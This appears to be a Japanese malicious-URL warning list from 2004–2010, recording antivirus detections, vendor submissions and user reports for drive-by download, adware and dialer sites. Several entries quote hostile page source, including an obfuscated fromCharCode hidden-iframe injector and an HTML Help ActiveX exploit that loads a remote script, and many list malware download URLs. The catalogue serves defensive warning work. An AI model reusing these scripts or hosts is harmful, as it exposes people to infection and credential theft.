通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
[2008/08/03] | ウィルス名:TSC_GENCLEAN+TROJ_NUWAR.UW |
[2005/07/12] | ウィルス名:JAVA_BYTEVER.A-1 。
ソースを見るとまず、暗号化された部分がある。以下抜粋+適当な箇所で改行。 <script language=javascript>eval(String.fromCharCode( 100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60, 105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58, 47,47,56,50,46,49,55,57,46,49,55,48,46,49,49,47,49,48,56,53,47, 39,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58, 110,111,110,101,39,62,60,47,105,102,114,97,109,101,62,34,41))</script> ↑ 上を復号化すると下のスクリプトが現れる。 ↓ document.write("<iframe src='http://82.179.170.11/1085/' style='display : none'></iframe>") また、別にIFRAMEタグで以下のURLを呼び出す。 //195.225.177.33/0023.html |
[2004/09/09] | 定期的にアダルト関連のポップアップ広告を表示するIEツールバー。 |
[2005/09/24] | DLまでバスター無反応。解凍するとウィルス名:ADW_DAILYBAR.A を検出。 |
[2006/10/18] | 海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。 //67.15.114.122/my_stat.php |
[2006/01/25] | アドウェア配布サイト。踏むと こんな感じ のサイトだが、何かをインストールするよう催促してくる。「何か」とは以下のファイルと思われる。
//download.gainpublishing.com/dashbar/DashBarSetup.exe |
[2006/01/25] | アドウェア配布サイト。踏むと こんな感じ のサイト。このページ表示まで無害で、普通に閉じれる。
画面内の「FREE DOWNLOAD」の部分をクリックすると以下のファイルをDLできるが、アドウェアが仕組まれている。 //208.185.211.71/Dash/DashBugFreeSetup_new.exe |
[2006/08/16] | ウィルス名:TSPY_LINEAGE.AIK |
[2008/08/03] | Location ヘッダで以下のURLに飛ぶが、ウィルス名:EXPL_WMF.GEN を検出。
//www.data-jpn.com/css/_vti_vss/count/xp/def2.htm |
[2008/08/03] | ファイルサイズ:20.62 KB。ウィルス名:EXPL_WMF.GEN |
[2008/08/03] | こんな感じ のサイトだが、ウィルス名:EXPL_WMF.GEN を検出。 |
[2005/12/19] | スパイウェアの一種:アドウェア配布サイトと思われる。踏むと こんな感じ だが、ダイアログを表示し、「DateManagerSetup.exe」をインストールするよう催促してくる。
それを拒否すると若干違う こんな感じ になる。 「DateManagerSetup.exe」のURLは以下である。定期的に広告を表示するアドウェアらしい。 //download.gainpublishing.com/date-manager/DateManagerSetup.exe |
[2009/06/04] | ファイルサイズ:125 KB 。ウィルス名:TROJ_DLOADER.TUI |
[2008/08/03] | 2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AULZ |
[2006/10/08] | ウィルス名:ADW_WINAD.BN |
[2006/10/13] | 2006/10/08 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:ADW_WEBHANCER.AA として検出するよう対応、とのこと。 実際に 2006/10/08 にDLしたファイルからウィルス名:ADW_WEBHANCER.AA を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_WEBHANCER.AA を検出することを確認。 |
[2006/08/24] | 2006/08/16 にトレンドマイクロ社にファイルを提出。
今日、連絡があり、ウィルス名:SPYW_WEBHANCER.Q として検出するよう対応した、とのこと。 2006/08/16 にDLしたファイルからウィルス名:SPYW_WEBHANCER.Q を検出することを確認。 今日、改めてDLしてみてもウィルス名:SPYW_WEBHANCER.Q を検出することを確認。 |
[2010/01/26] | こんな感じ のサイト。ウィルス名:JAVA_BYTEVER.AT を検出。 |
[2010/01/26] | 他の方の結果は以下の「」内。
「徳島デリヘル/徳島・愛媛風俗求人バイト/高収入アルバイト風俗求人・愛媛。Trojan-Downloader.JS.Pegel.c を検出です。」 |
[2008/12/03] | ウィルス名:POSSIBLE_OTORUN8 |
[2007/02/01] | 5秒後に以下のファイルが落ちてくるが、ウィルス名:TROJ_Generic を検出。
//www.demon-crackers.net/0/Charge874523.scr |
[2007/02/01] | ウィルス名:TROJ_Generic |
[2007/03/20] | mailtoストーム。FDDアタック。無限ループ。ニュースストーム。Telnetストーム。 |
[2005/04/21] | ウィルス名:SPYW_DL228.A |
[2004/08/16] | DigiCrime,Inc.というサイト。最初に全画面で青い画面が表示。
ウイルスバスターではウィルス名:JOKE_BLUESCRN.A を検出だが単なるジョークで危険性はないと思われる。 メインページを開くときに ( ゚д゚)ハッ!という人の声のような音が聞こえ、英語のサイトなので内容は不明だがザッと見て回った限りでは危険性はないらしい。だが、少し挙動がおかしいところもあり。 |
[2008/10/12] | ウィルス名:EXPL_ANICMOO.GEN |
[2008/10/12] | 真っ白なページ。バスター無反応だが、他社製ウィルス駆除ソフトでは反応があると思われる。 |
[2008/10/12] | ウィルス名:PAK_GENERIC.001 |
[2008/10/12] | 真っ白なページだが、ウィルス名:EXPL_EXECOD.A を検出。 ソースの一部がコード変換されている。 |
[2007/05/28] | 水色のページだが、ウィルス名:TROJ_GENERIC+JS_AGENT.OLT を検出。 |
[2007/05/28] | ウィルス名:TROJ_GENERIC |
[2007/05/28] | ウィルス名:JS_AGENT.OLT |
[2007/05/28] | ウィルス名:TROJ_GENERIC+JS_AGENT.OLT |
[2006/01/25] | ウィルス名:TROJ_CF.A |
[2006/08/01] | 2006/07/21 にDL+解凍して現れた「SCD32.dll」ファイルをトレンドマイクロ社に提出。
2006/07/26 に返事があり、それは以下。 「弊社では現在のパターンファイル以降にて、ウイルス名:DIAL_RAS.GH として検出するよう対応する予定となりますので、アップデートをお待ちくださいますようお願いいたします。」 2006/07/26 の時点ではバスター無反応であった。 しかし、今日、改めてファイルをDLしてみると、ウィルス名:DIAL_RAS.GH を検出することを確認。 |
[2005/11/18] | ウィルス名:SPYW_KEYGUARD.12 |
[2006/08/24] | 2006/08/16 にトレンドマイクロ社にDL+解凍して現れた「setup.exe」ファイルを提出。
今日、連絡があり、ウィルス名:ADW_COMNET.A として検出するよう対応した、とのこと。 2006/08/16 にDLしたファイルからウィルス名: を検出することを確認。 今日、改めてDLしてみてもウィルス名:ADW_COMNET.A を検出することを確認。 |
[2007/05/19] | 2007/01/05 にトレンドマイクロ社に中身の「setup.exe」ファイルを提出。
2007/01/16 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。 2007/01/05 にDLしたファイルが手元に無いため、実際に検出対応したかどうかは未確認。 しかも、今日改めて当該URLを確認してみると、404になっていた。 |
[2006/08/24] | 2006/08/16 にトレンドマイクロ社にファイルを提出。
今日、連絡があり、ウィルス名:ADW_COMNET.A として検出するよう対応した、とのこと。 2006/08/16 にDLしたファイルからウィルス名:ADW_COMNET.A を検出することを確認。 今日、改めてDLしてみてもウィルス名:ADW_COMNET.A を検出することを確認。 |
[2006/10/29] | こんな感じ の海外アダルトサイト。
踏むと下の @ をインストールしろ、と2回ほど言ってくる。 拒否すると A をDLしろ、と言ってくる。@ と A はバスター無反応であったが、不定期的に新しいファイルに置き換えられるものと思われる。 @、//www.kjdhendieldiouyu.com/sw/fvp.cab#version=1,0,0,26 A、//www.kjdhendieldiouyu.com/sw/fas/freevideogirls.exe |
[2006/10/29] | 他の方の結果は以下の「」内。
「大窓でAXコントロールのインストールをさせようとする海外アダルト系ページが開きます。 そのページのインストール云々のリンクをクリックしてみると not-a-virus:Porn-Dialer.Win32.Agent.ak を Kaspersky で検出します。」 |
[2006/10/13] | こんな感じ のサイト。海外アダルトサイトである。
踏むと何かをインストールしろ、と言ってきてウィルス名:TROJ_AGENT.AHO を検出。 拒否するともう一度何かをインストールしろ、と言ってきて再度ウィルス名:TROJ_AGENT.AHO を検出。 それも拒否すると今度は「freevideogirls.exe」なるものをDLしろ、と言ってくるが、この「freevideogirls.exe」はウィルス名:DIAL_AGENT.FOY を検出する。 |
[2007/04/18] | ウィルス名:JS_AGENT.IXY |
[2006/04/22] | 中国系サイトのようである。真っ白なページだが、ウィルス名:TSPY_LINEAGE.AIJ を検出。
このURLのソースはたった1行で書かれている。そのソースを改行したものが以下である。 <SCRIPT language=VScript src="xiao.gif"></SCRIPT> <SCRIPT language=VScript src="xiao.exe"></SCRIPT> <HTM><BODY><div style="display:none"> <OBJECT id="news048" type="application/x-oleobject" classid="CLSID:adb880a6-d8ff-11cf-9377-00aa003b7a11"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Window" value="$global_ifl"> <PARAM name="Item1" value='command;/winnt/help/apps.chm');</OBJECT> <OBJECT id="news096" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Window" value="$global_ifl"> <PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT language=JScript src=\\\"http://www.dj5566.org/mail///xiao.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")'></OBJECT> </div> <SCRIPT>news048.Click();f1=1+1;f1=f1+2;setTimeout("news096.Click();",00);fu1=2;fu1=3+4;</SCRIPT> </BODY></HTM> |
[2006/04/22] | 他の方の結果では、
「私の環境では、踏むと、IEのキャッシュに"xiao[1].exe"というファイルができており、そのファイルから Antidote で Trojan-PSW.Win32.Lineage.mz というトロイの木馬を検出しました。 (ただし、私の環境では、レジストリの改変などはありませんでした。 憶測ですが、WindowsUpdateをきちんとしていて、脆弱性の無い環境なら、不発に終わるものと思います) この手のオンラインゲームのパスワードを詐取するタイプのトロイは、ウイルス対策ソフトの検出を逃れるために、頻繁に亜種や新種が作成されるため、ノートンでも検出できないということは、十分ありえます。 1)ファイアウォールのログに異常がない(不審なプログラムが通信しようとしていない)。 2)目に見える異常(PCが異様に重い、BSODなど)がない。 上記二つを満たしていれば、おそらく感染していないと思います。 不安なら、ブラウザのキャッシュを削除してから、他社のオンラインスキャンなどを試してください。 オンラインスキャンの方法などについては、ご自分でGoogleなどでお調べください。」 |
[2006/05/21] | 改めて確認。ソースが書き換えられている。
こんな感じ のサイトだが、ウィルス名:TROJ_DLOADER.BZQ を検出。
ソースは以下である。 <embed type="audio/x-pn-realaudio-plugin" src="music.smi" controls="controlpanel,statusbar" height=95 width=150 autostart=true> |
[2006/05/21] | 他の方の結果は以下の「」内。
「Kaspersky 反応あり。Exploit.Win32.RealPoc.10.a 検出。」 |
[2006/05/21] | ウィルス名:TROJ_DLOADER.BZQ |
[2006/04/22] | ウィルス名:TSPY_LINEAGE.AIJ |
[2006/04/22] | gif画像ではなく、怪しいスクリプトである。IE直踏みではバスター無反応。 このURLのソースを直接取得すると こんな感じ であり、文字列に空白を入れて読みにくくしている。 その空白を詰めたのが これ である。暗号化された部分があるのが分かる。 |
[2008/10/02] | ウィルス名:TROJ_DLOAD.DU |
[2004/02/19] | ウィルス名:BKDR_LAMER.A1[ウィルスバスター]
ウィルス名:Backdoor.Death[ノートン] |
[2006/10/16] | 2006/10/09 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_QDIAL.AH として検出するよう対応、とのこと。 実際に 2006/10/09 にDLしたファイルからウィルス名:DIAL_QDIAL.AH を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_QDIAL.AH を検出することを確認。 |
[2006/10/16] | 2006/10/09 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_QDIAL.AH として検出するよう対応、とのこと。 実際に 2006/10/09 にDLしたファイルからウィルス名:DIAL_QDIAL.AH を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 新しいファイルに置き換えられている可能性がある。 |
[2009/04/12] | ファイルサイズ:276 KB 。ウィルス名:TROJ_DLOADER.XXE |
[2007/01/05] | ウィルス名:TSPY_BANCOS.GEN |
[2005/01/06] | SPYBOT反応:XXXToolbar |
[2008/08/03] | ウィルス名:TSC_GENCLEAN+TROJ_DNSCHANG.AA |
[2006/10/18] | 海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。 //67.15.114.122/my_stat.php |
[2006/01/01] | 踏んだ途端、ウィルス名:ADW_DOTCOMTBAR.Bを検出。同時にダイアログを表示し、下のcabファイルをインストールするよう催促してくる。
//www.dotcomtoolbar.com/toolbar_nieuw14.cab |
[2006/10/21] | 2006/10/14 にトレンドマイクロ社にDL+解凍して現れた「toolbar_nieuw9.dll」を提出。
2006/10/19 にその結果の連絡があり、ウィルス名:ADW_DCTOOLBAR.R として検出するよう対応、とのこと。 実際に 2006/10/14 にDLしたファイルからウィルス名:ADW_DCTOOLBAR.R を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_DCTOOLBAR.R を検出することを確認。 |
[2006/10/13] | 2006/10/08 にトレンドマイクロ社にDL+解凍して現れた「toolbar_nieuw10.dll」を提出。
今日、その結果の連絡があり、ウィルス名:ADW_DOTCOMBAR.A として検出するよう対応、とのこと。 実際に 2006/10/08 にDLしたファイルからウィルス名:ADW_DOTCOMBAR.A を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_DOTCOMBAR.A を検出することを確認。 |
[2006/10/21] | 2006/10/14 にトレンドマイクロ社にDL+解凍して現れた「toolbar_nieuw11.dll」を提出。
2006/10/19 にその結果の連絡があり、ウィルス名:ADW_DCTOOLBAR.R として検出するよう対応、とのこと。 実際に 2006/10/14 にDLしたファイルからウィルス名:ADW_DCTOOLBAR.R を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_DCTOOLBAR.R を検出することを確認。 |
[2006/10/21] | 2006/10/14 にトレンドマイクロ社にDL+解凍して現れた「toolbar_nieuw12.dll」を提出。
2006/10/19 にその結果の連絡があり、ウィルス名:ADW_DCTOOLBAR.R として検出するよう対応、とのこと。 実際に 2006/10/14 にDLしたファイルからウィルス名:ADW_DCTOOLBAR.R を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_DCTOOLBAR.R を検出することを確認。 |
[2006/10/21] | 2006/10/14 にトレンドマイクロ社にDL+解凍して現れた「toolbar_nieuw13.dll」を提出。
2006/10/19 にその結果の連絡があり、ウィルス名:ADW_DCTOOLBAR.R として検出するよう対応、とのこと。 実際に 2006/10/14 にDLしたファイルからウィルス名:ADW_DCTOOLBAR.R を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_DCTOOLBAR.R を検出することを確認。 |
[2006/10/14] | 他の方の結果では以下の「」内。
「remove.exe が落ちてきます。BitDefenderではTrojan.Qhosts.G を検出。 実行してみるとSearch Pageを //search.msn.com/spbasic.htm に変更されます。」 |
[2007/03/07] | 2006/10/09 にトレンドマイクロ社にファイルを提出。
2006/10/13 にその結果の連絡があり、ウィルス名:TROJ_QHOSTS.G として検出するよう対応、とのこと。 今日改めてDLしたファイルからウィルス名:TROJ_QHOSTS.G を検出することを確認。 恐らく、2006/10/09 から今日まではファイルは置き換えられていないと推測される。 |
[2006/10/21] | 2006/10/14 にトレンドマイクロ社にDL+解凍して現れた「toolbar_nieuw3.dll」を提出。
2006/10/19 にその結果の連絡があり、ウィルス名:ADW_DCTOOLBAR.O として検出するよう対応、とのこと。 実際に 2006/10/14 にDLしたファイルからウィルス名:ADW_DCTOOLBAR.O を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_DCTOOLBAR.O を検出することを確認。 |
[2006/10/13] | 2006/10/08 にトレンドマイクロ社にDL+解凍して現れた「toolbar_nieuw9.dll」を提出。
今日、その結果の連絡があり、ウィルス名:ADW_DOTCOMBAR.A として検出するよう対応、とのこと。 実際に 2006/10/08 にDLしたファイルからウィルス名:ADW_DOTCOMBAR.A を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_DOTCOMBAR.A を検出することを確認。 |
[2006/10/21] | 2006/10/14 にトレンドマイクロ社にDL+解凍して現れた「toolbar_nieuw10.dll」を提出。
2006/10/19 にその結果の連絡があり、ウィルス名:ADW_DCTOOLBAR.O として検出するよう対応、とのこと。 実際に 2006/10/14 にDLしたファイルからウィルス名:ADW_DCTOOLBAR.O を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_DCTOOLBAR.O を検出することを確認。 |
[2006/10/21] | 2006/10/14 にトレンドマイクロ社にDL+解凍して現れた「toolbar_nieuw11.dll」を提出。
2006/10/19 にその結果の連絡があり、ウィルス名:ADW_DCTOOLBAR.O として検出するよう対応、とのこと。 実際に 2006/10/14 にDLしたファイルからウィルス名:ADW_DCTOOLBAR.O を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_DCTOOLBAR.O を検出することを確認。 |
[2006/10/21] | 2006/10/14 にトレンドマイクロ社にDL+解凍して現れた「toolbar_nieuw12.dll」を提出。
2006/10/19 にその結果の連絡があり、ウィルス名:ADW_DCTOOLBAR.O として検出するよう対応、とのこと。 実際に 2006/10/14 にDLしたファイルからウィルス名:ADW_DCTOOLBAR.O を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_DCTOOLBAR.O を検出することを確認。 |
[2006/10/13] | ウィルス名:SPYW_DCTOOLBAR.A |
[2006/10/13] | ウィルス名:ADW_DOTCOMTBAR.B |
[2006/05/18] | こんな感じ のサイトで、別窓は これ 。
HDDが暫く唸り出し、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC+EXPL_WMF.GEN+TROJ_NASCENE.Y を検出。 「xpl.wmf」ファイルを3つDLしろ、と言ってくる。 ソースを見ると2箇所でIFRAMEタグを使い、以下のURLを呼び出している。 //www.doubleh.fr/audio/index.htm |
[2006/05/18] | 他の方の結果では
「Kaspersky 反応あり。Exploit.HTML.Mht 複数 、Trojan-Downloader.Win32.Agent.acd 。 ClamWinでTrojan.JS.Inor.A 検出。 |
[2006/04/25] | ウィルス名:TROJ_NASCENE.Y+JAVA_BYTEVER.A+JAVA_BYTEVER.C+JS_ONLOADXPLT.A
踏むと暫くの間、HDDが唸り出し、「xpl.wmf」をDLしろ、と言ってくる。 このサイトは以下の4つのURLをIFRAMEタグを使って呼び出している。それが原因。それぞれのURL List解説も参照。 //traffdollars.biz/dl/adv553.php //1-extreme.biz/traff.php?adv=35 //traff4all.biz/adv/174/new.php //85.255.113.22/inc/nan49.html |
[2006/04/25] | 他の方の結果は以下の「」内。
「緊急報告。ウイルス有。しかも勝手に何かをDLさせる模様。瞬時に終わるDLに対応間に合わず。PC激有害の可能性有り。踏まないことを強く推奨。」 |
[2006/04/25] | 「一見怪しくないように見えつつ多数のページに飛ばしてくれます。」 |
[2006/04/25] | 「VB反応、WMFのホールを突くスクリプト。PC有害です。」 |
[2006/04/25] | 「アップローダーっぽいアドレスですが、zipファイルのダウンロードページではありません。
MS06-001 WMF Exploit 、JS:OpenConnection-I 、JS:Classloader-6 を検出。」 |
[2006/04/14] | 踏むと真っ白なページだが、HDDが唸り出し、ウィルス名:TROJ_NASCENE.Y+JAVA_BYTEVER.A+JAVA_BYTEVER.C+JS_ONLOADXPLT.A を検出。
更に、「xpl.wmf」を2つ、「xpl35.wmf」を1つ、それぞれDLしろ、と言ってくる。 さらに これ も表示。これは閉じても再び表示している。15回ほど閉じると消える。 このサイトは以下の4つのURLをIFRAMEタグを使って呼び出している。それが原因。それぞれのURL List解説も参照。 //traffdollars.biz/dl/adv553.php //1-extreme.biz/traff.php?adv=35 //traff4all.biz/adv/174/new.php //85.255.113.22/inc/nan49.html |
[2006/04/18] | 他の方の結果では
「Kaspersky反応あり。Exploit.HTML.ObjData 、Trojan-Downloader.Win32.Agent.acd 、Exploit.HTML.Mht 検出。」 |
[2006/05/21] | avast! ではウィルス名:JS:OpenConnection-I+JS:Classloader-6+MS06-001 WMF Exploit を検出するらしい。 |
[2009/12/27] | ファイルサイズ:192 KB 。いくつかのウィルス駆除ソフトで反応がある。不正なプログラムの一種と思われる。 |
[2006/06/12] | ワンクリック詐欺サイト関連のURL。踏むと「DownloadMAX.exe」なるファイルをDLしろ、と言ってくる。 |
[2006/06/12] | ワンクリック詐欺サイト関連のURL。実行すると、いきなり請求書が画面に張られて再起動しても、張られたままになるらしい。
バスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → TR/Spy.VB.MN.15 Ewido → Logger.VB.mn Fortinet → Spy/PWS Ikarus → Trojan.Win32.VB.ACK Kaspersky → Trojan-Spy.Win32.VB.mn McAfee → Generic PWS.g NOD32v2 → a variant of Win32/PSW.VB.FS Symantec → Trojan.Hachilem TheHacker → Trojan/Spy.VB.mn UNA → Trojan.Spy.Win32.VB VBA32 → Trojan-Spy.Win32.VB.mn |
[2006/06/12] | ワンクリック詐欺サイト関連のURL。このURLは以下のURLに飛ぶので、そちらのURL List解説を参照。
//www.downloadmax.net/download/ |
[2005/02/24] | 踏むと こんな感じのサイト 。バスター無反応だがソースを見るとExploit.HTML.Mhtがある。 |
[2005/04/21] | ウィルス名:BKDR_JEEMP.C |
[2005/02/24] | コンパイル済みHTMLヘルプファイルが落ちてくる。だがウィルス名:CHM_MINER.Aを検出。 |
[2006/09/07] | 2006/08/20 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.DD として検出するよう対応、とのこと。 2006/08/20 にDLしたファイルからウィルス名:CHM_CODEBASE.DD を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:CHM_CODEBASE.DD を検出することを確認。 |
[2007/02/17] | 踏むと水色のページ。バスター無反応だが、ソースを見ると以下の2つのURLをIFRAMEタグで呼び出している。
//www.game-fc2blog.com/guiink/wz.htm //www.game-fc2blog.com/guiink/wu.htm |
[2006/02/22] | 他の方の結果は以下。
「動画のホスティングサイトのようですが、当方の環境では挙動がおかしいように感じました。何かのタグを呼び込んでる感じなんだけど、当環境ではウィルス反応はありませんでした。スパイクッキーは有。ポプアプも有。ブロックを推奨。 このURLにある動画はリロードするとその都度中身が変わります。完全に有害とも言い切れませんので、環境によっては微有害と判定。」 |
[2006/10/18] | 海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。 //67.15.114.122/my_stat.php |
[2006/10/18] | 海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。 //67.15.114.122/my_stat.php |